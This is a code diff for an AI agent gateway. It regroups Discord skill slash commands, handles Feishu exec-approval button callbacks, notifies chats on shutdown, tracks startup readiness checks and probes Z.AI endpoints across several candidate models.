self._app.router.add_post("/v1/chat/completions", self._handle_chat_completions)
+69 -25
View File
@@ -1736,46 +1736,90 @@ class DiscordAdapter(BasePlatformAdapter):
async def slash_btw(interaction: discord.Interaction, question: str):
await self._run_simple_slash(interaction, f"/btw {question}")
# Register installed skills as native slash commands (parity with
# Telegram, which uses telegram_menu_commands() in commands.py).
# Discord allows up to 100 application commands globally.
_DISCORD_CMD_LIMIT = 100
# Register skills under a single /skill command group with category
# subcommand groups. This uses 1 top-level slot instead of N,
# supporting up to 25 categories × 25 skills = 625 skills.
self._register_skill_group(tree)
def _register_skill_group(self, tree) -> None:
"""Register a ``/skill`` command group with category subcommand groups.
Skills are organized by their directory category under ``SKILLS_DIR``.
Each category becomes a subcommand group; root-level skills become
direct subcommands. Discord supports 25 subcommand groups × 25
subcommands each = 625 skills — well beyond the old 100-command cap.
"""
try:
from hermes_cli.commands import discord_skill_commands
from hermes_cli.commands import discord_skill_commands_by_category
existing_names = {cmd.name for cmd in tree.get_commands()}
remaining_slots = max(0, _DISCORD_CMD_LIMIT - len(existing_names))
existing_names = set()
try:
existing_names = {cmd.name for cmd in tree.get_commands()}
except Exception:
pass
skill_entries, skipped = discord_skill_commands(
max_slots=remaining_slots,
categories, uncategorized, hidden = discord_skill_commands_by_category(
reserved_names=existing_names,
)
for discord_name, description, cmd_key in skill_entries:
# Closure factory to capture cmd_key per iteration
def _make_skill_handler(_key: str):
async def _skill_slash(interaction: discord.Interaction, args: str = ""):
await self._run_simple_slash(interaction, f"{_key} {args}".strip())
return _skill_slash
if not categories and not uncategorized:
return
handler = _make_skill_handler(cmd_key)
handler.__name__ = f"skill_{discord_name.replace('-', '_')}"
skill_group = discord.app_commands.Group(
name="skill",
description="Run a Hermes skill",
)
# ── Helper: build a callback for a skill command key ──
def _make_handler(_key: str):
@discord.app_commands.describe(args="Optional arguments for the skill")
async def _handler(interaction: discord.Interaction, args: str = ""):
await self._run_simple_slash(interaction, f"{_key} {args}".strip())
_handler.__name__ = f"skill_{_key.lstrip('/').replace('-', '_')}"
return _handler
# ── Uncategorized (root-level) skills → direct subcommands ──
for discord_name, description, cmd_key in uncategorized:
cmd = discord.app_commands.Command(
name=discord_name,
description=description,
callback=handler,
description=description or f"Run the {discord_name} skill",
callback=_make_handler(cmd_key),
)
discord.app_commands.describe(args="Optional arguments for the skill")(cmd)
tree.add_command(cmd)
skill_group.add_command(cmd)
if skipped:
# ── Category subcommand groups ──
for cat_name in sorted(categories):
cat_desc = f"{cat_name.replace('-', ' ').title()} skills"
if len(cat_desc) > 100:
cat_desc = cat_desc[:97] + "..."
cat_group = discord.app_commands.Group(
name=cat_name,
description=cat_desc,
parent=skill_group,
)
for discord_name, description, cmd_key in categories[cat_name]:
cmd = discord.app_commands.Command(
name=discord_name,
description=description or f"Run the {discord_name} skill",
callback=_make_handler(cmd_key),
)
cat_group.add_command(cmd)
tree.add_command(skill_group)
total = sum(len(v) for v in categories.values()) + len(uncategorized)
logger.info(
"[%s] Registered /skill group: %d skill(s) across %d categories"
" + %d uncategorized",
self.name, total, len(categories), len(uncategorized),
)
if hidden:
logger.warning(
"[%s] Discord slash command limit reached (%d): %d skill(s) not registered",
self.name, _DISCORD_CMD_LIMIT, skipped,
"[%s] %d skill(s) not registered (Discord subcommand limits)",
self.name, hidden,
)
except Exception as exc:
logger.warning("[%s] Failed to register skill slash commands: %s", self.name, exc)
logger.warning("[%s] Failed to register /skill group: %s", self.name, exc)
def _build_slash_event(self, interaction: discord.Interaction, text: str) -> MessageEvent:
"""Build a MessageEvent from a Discord slash command interaction."""
+109 -73
View File
@@ -72,7 +72,10 @@ try:
UpdateMessageRequestBody,
)
from lark_oapi.core.const import FEISHU_DOMAIN, LARK_DOMAIN
from lark_oapi.event.callback.model.p2_card_action_trigger import P2CardActionTriggerResponse
from lark_oapi.event.callback.model.p2_card_action_trigger import (
CallBackCard,
P2CardActionTriggerResponse,
)
from lark_oapi.event.dispatcher_handler import EventDispatcherHandler
from lark_oapi.ws import Client as FeishuWSClient
@@ -80,6 +83,7 @@ try:
except ImportError:
FEISHU_AVAILABLE = False
lark = None # type: ignore[assignment]
CallBackCard = None # type: ignore[assignment]
P2CardActionTriggerResponse = None # type: ignore[assignment]
EventDispatcherHandler = None # type: ignore[assignment]
FeishuWSClient = None # type: ignore[assignment]
@@ -169,6 +173,19 @@ _FEISHU_WEBHOOK_BODY_TIMEOUT_SECONDS = 30 # max seconds to read request
_FEISHU_WEBHOOK_ANOMALY_THRESHOLD = 25 # consecutive error responses before WARNING log
_FEISHU_WEBHOOK_ANOMALY_TTL_SECONDS = 6 * 60 * 60 # anomaly tracker TTL (6 hours) — matches openclaw
_FEISHU_CARD_ACTION_DEDUP_TTL_SECONDS = 15 * 60 # card action token dedup window (15 min)
_APPROVAL_CHOICE_MAP: Dict[str, str] = {
"approve_once": "once",
"approve_session": "session",
"approve_always": "always",
"deny": "deny",
}
_APPROVAL_LABEL_MAP: Dict[str, str] = {
"once": "Approved once",
"session": "Approved for session",
"always": "Approved permanently",
"deny": "Denied",
}
_FEISHU_BOT_MSG_TRACK_SIZE = 512 # LRU size for tracking sent message IDs
_FEISHU_REPLY_FALLBACK_CODES = frozenset({230011, 231003}) # reply target withdrawn/missing → create fallback
_FEISHU_ACK_EMOJI = "OK"
@@ -1490,14 +1507,12 @@ class FeishuAdapter(BasePlatformAdapter):
logger.warning("[Feishu] send_exec_approval failed: %s", exc)
return SendResult(success=False, error=str(exc))
async def _update_approval_card(
self, message_id: str, label: str, user_name: str, choice: str,
) -> None:
"""Replace the approval card with a resolved status card."""
if not self._client or not message_id:
return
@staticmethod
def _build_resolved_approval_card(*, choice: str, user_name: str) -> Dict[str, Any]:
"""Build raw card JSON for a resolved approval action."""
icon = "" if choice == "deny" else ""
card = {
label = _APPROVAL_LABEL_MAP.get(choice, "Resolved")
return {
"config": {"wide_screen_mode": True},
"header": {
"title": {"content": f"{icon} {label}", "tag": "plain_text"},
@@ -1510,13 +1525,6 @@ class FeishuAdapter(BasePlatformAdapter):
},
],
}
try:
payload = json.dumps(card, ensure_ascii=False)
body = self._build_update_message_body(msg_type="interactive", content=payload)
request = self._build_update_message_request(message_id=message_id, request_body=body)
await asyncio.to_thread(self._client.im.v1.message.update, request)
except Exception as exc:
logger.warning("[Feishu] Failed to update approval card %s: %s", message_id, exc)
async def send_voice(
self,
@@ -1845,20 +1853,82 @@ class FeishuAdapter(BasePlatformAdapter):
future.add_done_callback(self._log_background_failure)
def _on_card_action_trigger(self, data: Any) -> Any:
"""Schedule Feishu card actions on the adapter loop and acknowledge immediately."""
"""Handle card-action callback from the Feishu SDK (synchronous).
For approval actions: parses the event once, returns the resolved card
inline (the only reliable way to sync all clients), and schedules a
lightweight async method to actually unblock the agent.
For other card actions: delegates to ``_handle_card_action_event``.
"""
loop = self._loop
if loop is None or bool(getattr(loop, "is_closed", lambda: False)()):
if not self._loop_accepts_callbacks(loop):
logger.warning("[Feishu] Dropping card action before adapter loop is ready")
else:
future = asyncio.run_coroutine_threadsafe(
self._handle_card_action_event(data),
loop,
)
future.add_done_callback(self._log_background_failure)
return P2CardActionTriggerResponse() if P2CardActionTriggerResponse else None
event = getattr(data, "event", None)
action = getattr(event, "action", None)
action_value = getattr(action, "value", {}) or {}
hermes_action = action_value.get("hermes_action") if isinstance(action_value, dict) else None
if hermes_action:
return self._handle_approval_card_action(event=event, action_value=action_value, loop=loop)
self._submit_on_loop(loop, self._handle_card_action_event(data))
if P2CardActionTriggerResponse is None:
return None
return P2CardActionTriggerResponse()
@staticmethod
def _loop_accepts_callbacks(loop: Any) -> bool:
"""Return True when the adapter loop can accept thread-safe submissions."""
return loop is not None and not bool(getattr(loop, "is_closed", lambda: False)())
def _submit_on_loop(self, loop: Any, coro: Any) -> None:
"""Schedule background work on the adapter loop with shared failure logging."""
future = asyncio.run_coroutine_threadsafe(coro, loop)
future.add_done_callback(self._log_background_failure)
def _handle_approval_card_action(self, *, event: Any, action_value: Dict[str, Any], loop: Any) -> Any:
"""Schedule approval resolution and build the synchronous callback response."""
approval_id = action_value.get("approval_id")
if approval_id is None:
logger.debug("[Feishu] Card action missing approval_id, ignoring")
return P2CardActionTriggerResponse() if P2CardActionTriggerResponse else None
choice = _APPROVAL_CHOICE_MAP.get(action_value.get("hermes_action"), "deny")
operator = getattr(event, "operator", None)
open_id = str(getattr(operator, "open_id", "") or "")
user_name = self._get_cached_sender_name(open_id) or open_id
self._submit_on_loop(loop, self._resolve_approval(approval_id, choice, user_name))
if P2CardActionTriggerResponse is None:
return None
response = P2CardActionTriggerResponse()
if CallBackCard is not None:
card = CallBackCard()
card.type = "raw"
card.data = self._build_resolved_approval_card(choice=choice, user_name=user_name)
response.card = card
return response
async def _resolve_approval(self, approval_id: Any, choice: str, user_name: str) -> None:
"""Pop approval state and unblock the waiting agent thread."""
state = self._approval_state.pop(approval_id, None)
if not state:
logger.debug("[Feishu] Approval %s already resolved or unknown", approval_id)
return
try:
from tools.approval import resolve_gateway_approval
count = resolve_gateway_approval(state["session_key"], choice)
logger.info(
"Feishu button resolved %d approval(s) for session %s (choice=%s, user=%s)",
count, state["session_key"], choice, user_name,
)
except Exception as exc:
logger.error("Failed to resolve gateway approval from Feishu button: %s", exc)
async def _handle_reaction_event(self, event_type: str, data: Any) -> None:
"""Fetch the reacted-to message; if it was sent by this bot, emit a synthetic text event."""
if not self._client:
@@ -1950,51 +2020,6 @@ class FeishuAdapter(BasePlatformAdapter):
action_tag = str(getattr(action, "tag", "") or "button")
action_value = getattr(action, "value", {}) or {}
# --- Exec approval button intercept ---
hermes_action = action_value.get("hermes_action") if isinstance(action_value, dict) else None
if hermes_action:
approval_id = action_value.get("approval_id")
state = self._approval_state.pop(approval_id, None)
if not state:
logger.debug("[Feishu] Approval %s already resolved or unknown", approval_id)
return
choice_map = {
"approve_once": "once",
"approve_session": "session",
"approve_always": "always",
"deny": "deny",
}
choice = choice_map.get(hermes_action, "deny")
label_map = {
"once": "Approved once",
"session": "Approved for session",
"always": "Approved permanently",
"deny": "Denied",
}
label = label_map.get(choice, "Resolved")
# Resolve sender name for the status card
sender_id = SimpleNamespace(open_id=open_id, user_id=None, union_id=None)
sender_profile = await self._resolve_sender_profile(sender_id)
user_name = sender_profile.get("user_name") or open_id
# Resolve the approval — unblocks the agent thread
try:
from tools.approval import resolve_gateway_approval
count = resolve_gateway_approval(state["session_key"], choice)
logger.info(
"Feishu button resolved %d approval(s) for session %s (choice=%s, user=%s)",
count, state["session_key"], choice, user_name,
)
except Exception as exc:
logger.error("Failed to resolve gateway approval from Feishu button: %s", exc)
# Update the card to show the decision
await self._update_approval_card(state.get("message_id", ""), label, user_name, choice)
return
synthetic_text = f"/card {action_tag}"
if action_value:
try:
@@ -2897,6 +2922,19 @@ class FeishuAdapter(BasePlatformAdapter):
"user_id_alt": union_id,
}
def _get_cached_sender_name(self, sender_id: Optional[str]) -> Optional[str]:
"""Return a cached sender name only while its TTL is still valid."""
if not sender_id:
return None
cached = self._sender_name_cache.get(sender_id)
if cached is None:
return None
name, expire_at = cached
if time.time() < expire_at:
return name
self._sender_name_cache.pop(sender_id, None)
return None
async def _resolve_sender_name_from_api(self, sender_id: Optional[str]) -> Optional[str]:
"""Fetch the sender's display name from the Feishu contact API with a 10-minute cache.
@@ -2909,11 +2947,9 @@ class FeishuAdapter(BasePlatformAdapter):
if not trimmed:
return None
now = time.time()
cached = self._sender_name_cache.get(trimmed)
if cached is not None:
name, expire_at = cached
if now < expire_at:
return name
cached_name = self._get_cached_sender_name(trimmed)
if cached_name is not None:
return cached_name
try:
from lark_oapi.api.contact.v3 import GetUserRequest # lazy import
if trimmed.startswith("ou_"):
+149 -7
View File
@@ -1391,6 +1391,65 @@ class GatewayRunner:
except Exception as e:
logger.debug("Failed interrupting agent during shutdown: %s", e)
async def _notify_active_sessions_of_shutdown(self) -> None:
"""Send a notification to every chat with an active agent.
Called at the very start of stop() adapters are still connected so
messages can be delivered. Best-effort: individual send failures are
logged and swallowed so they never block the shutdown sequence.
"""
active = self._snapshot_running_agents()
if not active:
return
action = "restarting" if self._restart_requested else "shutting down"
hint = (
"Your current task will be interrupted. "
"Use /retry after restart to continue."
if self._restart_requested
else "Your current task will be interrupted."
)
msg = f"⚠️ Gateway {action}{hint}"
notified: set = set()
for session_key in active:
# Parse platform + chat_id from the session key.
# Format: agent:main:{platform}:{chat_type}:{chat_id}[:{extra}...]
parts = session_key.split(":")
if len(parts) < 5:
continue
platform_str = parts[2]
chat_id = parts[4]
# Deduplicate: one notification per chat, even if multiple
# sessions (different users/threads) share the same chat.
dedup_key = (platform_str, chat_id)
if dedup_key in notified:
continue
try:
platform = Platform(platform_str)
adapter = self.adapters.get(platform)
if not adapter:
continue
# Include thread_id if present so the message lands in the
# correct forum topic / thread.
thread_id = parts[5] if len(parts) > 5 else None
metadata = {"thread_id": thread_id} if thread_id else None
await adapter.send(chat_id, msg, metadata=metadata)
notified.add(dedup_key)
logger.info(
"Sent shutdown notification to %s:%s",
platform_str, chat_id,
)
except Exception as e:
logger.debug(
"Failed to send shutdown notification to %s:%s: %s",
platform_str, chat_id, e,
)
def _finalize_shutdown_agents(self, active_agents: Dict[str, Any]) -> None:
for agent in active_agents.values():
try:
@@ -1481,7 +1540,7 @@ class GatewayRunner:
pass
try:
from gateway.status import write_runtime_status
write_runtime_status(gateway_state="starting", exit_reason=None)
write_runtime_status(gateway_state="starting", exit_reason=None, startup_checks={})
except Exception:
pass
@@ -1523,8 +1582,23 @@ class GatewayRunner:
"or configure platform allowlists (e.g., TELEGRAM_ALLOWED_USERS=your_id)."
)
# Discover plugins before hooks so plugin-owned hook bundles can
# participate in this same startup cycle.
try:
from hermes_cli.plugins import discover_plugins
discover_plugins()
except Exception as e:
logger.warning("Plugin discovery during gateway startup failed: %s", e)
# Discover and load event hooks
self.hooks.discover_and_load()
try:
from gateway.status import reset_startup_checks
reset_startup_checks(self.hooks.loaded_hooks)
except Exception as e:
logger.warning("Startup readiness initialization failed: %s", e)
# Recover background processes from checkpoint (crash recovery)
try:
@@ -2018,6 +2092,10 @@ class GatewayRunner:
self._running = False
self._draining = True
# Notify all chats with active agents BEFORE draining.
# Adapters are still connected here, so messages can be sent.
await self._notify_active_sessions_of_shutdown()
timeout = self._restart_drain_timeout
active_agents, timed_out = await self._drain_active_agents(timeout)
if timed_out:
@@ -2041,6 +2119,11 @@ class GatewayRunner:
logger.error("Failed to launch detached gateway restart: %s", e)
self._finalize_shutdown_agents(active_agents)
await self.hooks.emit("gateway:shutdown", {
"restart": self._restart_requested,
"service_restart": self._restart_via_service,
"detached_restart": self._restart_detached,
})
for platform, adapter in list(self.adapters.items()):
try:
@@ -2088,12 +2171,23 @@ class GatewayRunner:
# Write a clean-shutdown marker so the next startup knows this
# wasn't a crash. suspend_recently_active() only needs to run
# after unexpected exits — graceful shutdowns already drain
# active agents, so there's no stuck-session risk.
try:
(_hermes_home / ".clean_shutdown").touch()
except Exception:
pass
# after unexpected exits. However, if the drain timed out and
# agents were force-interrupted, their sessions may be in an
# incomplete state (trailing tool response, no final assistant
# message). Skip the marker in that case so the next startup
# suspends those sessions — giving users a clean slate instead
# of resuming a half-finished tool loop.
if not timed_out:
try:
(_hermes_home / ".clean_shutdown").touch()
except Exception:
pass
else:
logger.info(
"Skipping .clean_shutdown marker — drain timed out with "
"interrupted agents; next startup will suspend recently "
"active sessions."
)
if self._restart_requested and self._restart_via_service:
self._exit_code = GATEWAY_SERVICE_RESTART_EXIT_CODE
@@ -9187,8 +9281,41 @@ async def start_gateway(config: Optional[GatewayConfig] = None, replace: bool =
runner = GatewayRunner(config)
# Track whether a signal initiated the shutdown (vs. internal request).
# When an unexpected SIGTERM kills the gateway, we exit non-zero so
# systemd's Restart=on-failure revives the process. systemctl stop
# is safe: systemd tracks stop-requested state independently of exit
# code, so Restart= never fires for a deliberate stop.
_signal_initiated_shutdown = False
# Set up signal handlers
def shutdown_signal_handler():
nonlocal _signal_initiated_shutdown
_signal_initiated_shutdown = True
logger.info("Received SIGTERM/SIGINT — initiating shutdown")
# Diagnostic: log all hermes-related processes so we can identify
# what triggered the signal (hermes update, hermes gateway restart,
# a stale detached subprocess, etc.).
try:
import subprocess as _sp
_ps = _sp.run(
["ps", "aux"],
capture_output=True, text=True, timeout=3,
)
_hermes_procs = [
line for line in _ps.stdout.splitlines()
if ("hermes" in line.lower() or "gateway" in line.lower())
and str(os.getpid()) not in line.split()[1:2] # exclude self
]
if _hermes_procs:
logger.warning(
"Shutdown diagnostic — other hermes processes running:\n %s",
"\n ".join(_hermes_procs),
)
else:
logger.info("Shutdown diagnostic — no other hermes processes found")
except Exception:
pass
asyncio.create_task(runner.stop())
def restart_signal_handler():
@@ -9258,6 +9385,21 @@ async def start_gateway(config: Optional[GatewayConfig] = None, replace: bool =
if runner.exit_code is not None:
raise SystemExit(runner.exit_code)
# When a signal (SIGTERM/SIGINT) caused the shutdown and it wasn't a
# planned restart (/restart, /update, SIGUSR1), exit non-zero so
# systemd's Restart=on-failure revives the process. This covers:
# - hermes update killing the gateway mid-work
# - External kill commands
# - WSL2/container runtime sending unexpected signals
# systemctl stop is safe: systemd tracks "stop requested" state
# independently of exit code, so Restart= never fires for it.
if _signal_initiated_shutdown and not runner._restart_requested:
logger.info(
"Exiting with code 1 (signal-initiated shutdown without restart "
"request) so systemd Restart=on-failure can revive the gateway."
)
return False # → sys.exit(1) in the caller
return True
+153 -3
View File
@@ -27,6 +27,7 @@ _RUNTIME_STATUS_FILE = "gateway_state.json"
_LOCKS_DIRNAME = "gateway-locks"
_IS_WINDOWS = sys.platform == "win32"
_UNSET = object()
_VALID_STARTUP_CHECK_STATES = {"pending", "ready", "failed"}
def _get_pid_path() -> Path:
@@ -162,11 +163,39 @@ def _build_runtime_status_record() -> dict[str, Any]:
"restart_requested": False,
"active_agents": 0,
"platforms": {},
"startup_checks": {},
"updated_at": _utc_now_iso(),
})
return payload
def _normalize_startup_check_entries(
startup_checks: Optional[dict[str, Any]],
) -> dict[str, dict[str, Any]]:
"""Normalize persisted startup readiness entries."""
if not isinstance(startup_checks, dict):
return {}
now = _utc_now_iso()
normalized: dict[str, dict[str, Any]] = {}
for raw_id, raw_payload in startup_checks.items():
check_id = str(raw_id).strip()
if not check_id:
continue
payload = raw_payload if isinstance(raw_payload, dict) else {}
state = str(payload.get("state", "pending")).strip().lower()
if state not in _VALID_STARTUP_CHECK_STATES:
state = "pending"
normalized[check_id] = {
"state": state,
"required": bool(payload.get("required", True)),
"source": payload.get("source"),
"detail": payload.get("detail"),
"updated_at": payload.get("updated_at") or now,
}
return normalized
def _read_json_file(path: Path) -> Optional[dict[str, Any]]:
if not path.exists():
return None
@@ -223,6 +252,7 @@ def write_runtime_status(
exit_reason: Any = _UNSET,
restart_requested: Any = _UNSET,
active_agents: Any = _UNSET,
startup_checks: Any = _UNSET,
platform: Any = _UNSET,
platform_state: Any = _UNSET,
error_code: Any = _UNSET,
@@ -245,6 +275,8 @@ def write_runtime_status(
payload["restart_requested"] = bool(restart_requested)
if active_agents is not _UNSET:
payload["active_agents"] = max(0, int(active_agents))
if startup_checks is not _UNSET:
payload["startup_checks"] = _normalize_startup_check_entries(startup_checks)
if platform is not _UNSET:
platform_payload = payload["platforms"].get(platform, {})
@@ -262,13 +294,131 @@ def write_runtime_status(
def read_runtime_status() -> Optional[dict[str, Any]]:
"""Read the persisted gateway runtime health/status information."""
return _read_json_file(_get_runtime_status_path())
payload = _read_json_file(_get_runtime_status_path())
if payload is None:
return None
payload.setdefault("platforms", {})
payload["startup_checks"] = _normalize_startup_check_entries(payload.get("startup_checks"))
return payload
def reset_startup_checks(checks: Optional[list[dict[str, Any]]] = None) -> dict[str, dict[str, Any]]:
"""Replace persisted startup readiness checks for the current run."""
normalized: dict[str, dict[str, Any]] = {}
now = _utc_now_iso()
for hook in checks or []:
if not isinstance(hook, dict):
continue
readiness = hook.get("startup_readiness")
if not isinstance(readiness, dict):
continue
check_id = str(readiness.get("id", "")).strip()
if not check_id:
continue
normalized[check_id] = {
"state": "pending",
"required": bool(readiness.get("required", True)),
"source": hook.get("name"),
"detail": None,
"updated_at": now,
}
write_runtime_status(startup_checks=normalized)
return normalized
def update_startup_check(
check_id: str,
state: str,
*,
detail: Any = _UNSET,
required: Any = _UNSET,
source: Any = _UNSET,
) -> dict[str, Any]:
"""Update a single startup readiness check in the runtime status file."""
normalized_id = str(check_id).strip()
if not normalized_id:
raise ValueError("startup readiness check id is required")
normalized_state = str(state).strip().lower()
if normalized_state not in _VALID_STARTUP_CHECK_STATES:
raise ValueError(f"invalid startup readiness state: {state}")
path = _get_runtime_status_path()
payload = _read_json_file(path) or _build_runtime_status_record()
checks = _normalize_startup_check_entries(payload.get("startup_checks"))
existing = checks.get(normalized_id, {})
now = _utc_now_iso()
checks[normalized_id] = {
"state": normalized_state,
"required": bool(existing.get("required", True) if required is _UNSET else required),
"source": existing.get("source") if source is _UNSET else source,
"detail": existing.get("detail") if detail is _UNSET else detail,
"updated_at": now,
}
payload["startup_checks"] = checks
payload.setdefault("platforms", {})
payload.setdefault("kind", _GATEWAY_KIND)
payload["pid"] = os.getpid()
payload["start_time"] = _get_process_start_time(os.getpid())
payload["updated_at"] = now
_write_json_file(path, payload)
return checks[normalized_id]
def mark_startup_check_pending(
check_id: str,
*,
detail: Any = _UNSET,
required: Any = _UNSET,
source: Any = _UNSET,
) -> dict[str, Any]:
return update_startup_check(check_id, "pending", detail=detail, required=required, source=source)
def mark_startup_check_ready(
check_id: str,
*,
detail: Any = _UNSET,
required: Any = _UNSET,
source: Any = _UNSET,
) -> dict[str, Any]:
return update_startup_check(check_id, "ready", detail=detail, required=required, source=source)
def mark_startup_check_failed(
check_id: str,
*,
detail: Any = _UNSET,
required: Any = _UNSET,
source: Any = _UNSET,
) -> dict[str, Any]:
return update_startup_check(check_id, "failed", detail=detail, required=required, source=source)
def remove_pid_file() -> None:
"""Remove the gateway PID file if it exists."""
"""Remove the gateway PID file, but only if it belongs to this process.
During --replace handoffs, the old process's atexit handler can fire AFTER
the new process has written its own PID file. Blindly removing the file
would delete the new process's record, leaving the gateway running with no
PID file (invisible to ``get_running_pid()``).
"""
try:
_get_pid_path().unlink(missing_ok=True)
path = _get_pid_path()
record = _read_json_file(path)
if record is not None:
try:
file_pid = int(record["pid"])
except (KeyError, TypeError, ValueError):
file_pid = None
if file_pid is not None and file_pid != os.getpid():
# PID file belongs to a different process — leave it alone.
return
path.unlink(missing_ok=True)
except Exception:
pass
+38 -33
View File
@@ -383,13 +383,16 @@ def _resolve_api_key_provider_secret(
# Z.AI has separate billing for general vs coding plans, and global vs China
# endpoints. A key that works on one may return "Insufficient balance" on
# another. We probe at setup time and store the working endpoint.
# Each entry lists candidate models to try in order — newer coding plan accounts
# may only have access to recent models (glm-5.1, glm-5v-turbo) while older
# ones still use glm-4.7.
ZAI_ENDPOINTS = [
# (id, base_url, default_model, label)
("global", "https://api.z.ai/api/paas/v4", "glm-5", "Global"),
("cn", "https://open.bigmodel.cn/api/paas/v4", "glm-5", "China"),
("coding-global", "https://api.z.ai/api/coding/paas/v4", "glm-4.7", "Global (Coding Plan)"),
("coding-cn", "https://open.bigmodel.cn/api/coding/paas/v4", "glm-4.7", "China (Coding Plan)"),
# (id, base_url, probe_models, label)
("global", "https://api.z.ai/api/paas/v4", ["glm-5"], "Global"),
("cn", "https://open.bigmodel.cn/api/paas/v4", ["glm-5"], "China"),
("coding-global", "https://api.z.ai/api/coding/paas/v4", ["glm-5.1", "glm-5v-turbo", "glm-4.7"], "Global (Coding Plan)"),
("coding-cn", "https://open.bigmodel.cn/api/coding/paas/v4", ["glm-5.1", "glm-5v-turbo", "glm-4.7"], "China (Coding Plan)"),
]
@@ -397,35 +400,37 @@ def detect_zai_endpoint(api_key: str, timeout: float = 8.0) -> Optional[Dict[str
"""Probe z.ai endpoints to find one that accepts this API key.
Returns {"id": ..., "base_url": ..., "model": ..., "label": ...} for the
first working endpoint, or None if all fail.
first working endpoint, or None if all fail. For endpoints with multiple
candidate models, tries each in order and returns the first that succeeds.
"""
for ep_id, base_url, model, label in ZAI_ENDPOINTS:
try:
resp = httpx.post(
f"{base_url}/chat/completions",
headers={
"Authorization": f"Bearer {api_key}",
"Content-Type": "application/json",
},
json={
"model": model,
"stream": False,
"max_tokens": 1,
"messages": [{"role": "user", "content": "ping"}],
},
timeout=timeout,
)
if resp.status_code == 200:
logger.debug("Z.AI endpoint probe: %s (%s) OK", ep_id, base_url)
return {
"id": ep_id,
"base_url": base_url,
"model": model,
"label": label,
}
logger.debug("Z.AI endpoint probe: %s returned %s", ep_id, resp.status_code)
except Exception as exc:
logger.debug("Z.AI endpoint probe: %s failed: %s", ep_id, exc)
for ep_id, base_url, probe_models, label in ZAI_ENDPOINTS:
for model in probe_models:
try:
resp = httpx.post(
f"{base_url}/chat/completions",
headers={
"Authorization": f"Bearer {api_key}",
"Content-Type": "application/json",
},
json={
"model": model,
"stream": False,
"max_tokens": 1,
"messages": [{"role": "user", "content": "ping"}],
},
timeout=timeout,
)
if resp.status_code == 200:
logger.debug("Z.AI endpoint probe: %s (%s) model=%s OK", ep_id, base_url, model)
return {
"id": ep_id,
"base_url": base_url,
"model": model,
"label": label,
}
logger.debug("Z.AI endpoint probe: %s model=%s returned %s", ep_id, model, resp.status_code)
except Exception as exc:
logger.debug("Z.AI endpoint probe: %s model=%s failed: %s", ep_id, model, exc)
return None
+3 -3
View File
@@ -75,12 +75,12 @@ def prompt_for_secret(cli, var_name: str, prompt: str, metadata=None) -> dict:
if not hasattr(cli, "_secret_deadline"):
cli._secret_deadline = 0
try:
value = getpass.getpass(f"{prompt} (hidden, Enter to skip): ")
value = getpass.getpass(f"{prompt} (hidden, ESC or empty Enter to skip): ")
except (EOFError, KeyboardInterrupt):
value = ""
if not value:
cprint(f"\n{_DIM} ⏭ Secret entry cancelled{_RST}")
cprint(f"\n{_DIM} ⏭ Secret entry skipped{_RST}")
return {
"success": True,
"reason": "cancelled",
@@ -133,7 +133,7 @@ def prompt_for_secret(cli, var_name: str, prompt: str, metadata=None) -> dict:
cli._app.invalidate()
if not value:
cprint(f"\n{_DIM} ⏭ Secret entry cancelled{_RST}")
cprint(f"\n{_DIM} ⏭ Secret entry skipped{_RST}")
return {
"success": True,
"reason": "cancelled",
+110
View File
@@ -582,6 +582,116 @@ def discord_skill_commands(
)
def discord_skill_commands_by_category(
reserved_names: set[str],
) -> tuple[dict[str, list[tuple[str, str, str]]], list[tuple[str, str, str]], int]:
"""Return skill entries organized by category for Discord ``/skill`` subcommand groups.
Skills whose directory is nested at least 2 levels under ``SKILLS_DIR``
(e.g. ``creative/ascii-art/SKILL.md``) are grouped by their top-level
category. Root-level skills (e.g. ``dogfood/SKILL.md``) are returned as
*uncategorized* the caller should register them as direct subcommands
of the ``/skill`` group.
The same filtering as :func:`discord_skill_commands` is applied: hub
skills excluded, per-platform disabled excluded, names clamped.
Returns:
``(categories, uncategorized, hidden_count)``
- *categories*: ``{category_name: [(name, description, cmd_key), ...]}``
- *uncategorized*: ``[(name, description, cmd_key), ...]``
- *hidden_count*: skills dropped due to Discord group limits
(25 subcommand groups, 25 subcommands per group)
"""
from pathlib import Path as _P
_platform_disabled: set[str] = set()
try:
from agent.skill_utils import get_disabled_skill_names
_platform_disabled = get_disabled_skill_names(platform="discord")
except Exception:
pass
# Collect raw skill data --------------------------------------------------
categories: dict[str, list[tuple[str, str, str]]] = {}
uncategorized: list[tuple[str, str, str]] = []
_names_used: set[str] = set(reserved_names)
hidden = 0
try:
from agent.skill_commands import get_skill_commands
from tools.skills_tool import SKILLS_DIR
_skills_dir = SKILLS_DIR.resolve()
_hub_dir = (SKILLS_DIR / ".hub").resolve()
skill_cmds = get_skill_commands()
for cmd_key in sorted(skill_cmds):
info = skill_cmds[cmd_key]
skill_path = info.get("skill_md_path", "")
if not skill_path:
continue
sp = _P(skill_path).resolve()
# Skip skills outside SKILLS_DIR or from the hub
if not str(sp).startswith(str(_skills_dir)):
continue
if str(sp).startswith(str(_hub_dir)):
continue
skill_name = info.get("name", "")
if skill_name in _platform_disabled:
continue
raw_name = cmd_key.lstrip("/")
# Clamp to 32 chars (Discord limit)
discord_name = raw_name[:32]
if discord_name in _names_used:
continue
_names_used.add(discord_name)
desc = info.get("description", "")
if len(desc) > 100:
desc = desc[:97] + "..."
# Determine category from the relative path within SKILLS_DIR.
# e.g. creative/ascii-art/SKILL.md → parts = ("creative", "ascii-art")
try:
rel = sp.parent.relative_to(_skills_dir)
except ValueError:
continue
parts = rel.parts
if len(parts) >= 2:
cat = parts[0]
categories.setdefault(cat, []).append((discord_name, desc, cmd_key))
else:
uncategorized.append((discord_name, desc, cmd_key))
except Exception:
pass
# Enforce Discord limits: 25 subcommand groups, 25 subcommands each ------
_MAX_GROUPS = 25
_MAX_PER_GROUP = 25
trimmed_categories: dict[str, list[tuple[str, str, str]]] = {}
group_count = 0
for cat in sorted(categories):
if group_count >= _MAX_GROUPS:
hidden += len(categories[cat])
continue
entries = categories[cat][:_MAX_PER_GROUP]
hidden += max(0, len(categories[cat]) - _MAX_PER_GROUP)
trimmed_categories[cat] = entries
group_count += 1
# Uncategorized skills also count against the 25 top-level limit
remaining_slots = _MAX_GROUPS - group_count
if len(uncategorized) > remaining_slots:
hidden += len(uncategorized) - remaining_slots
uncategorized = uncategorized[:remaining_slots]
return trimmed_categories, uncategorized, hidden
def slack_subcommand_map() -> dict[str, str]:
"""Return subcommand -> /command mapping for Slack /hermes handler.
+125 -2
View File
@@ -10,6 +10,7 @@ import shutil
import signal
import subprocess
import sys
import time
from pathlib import Path
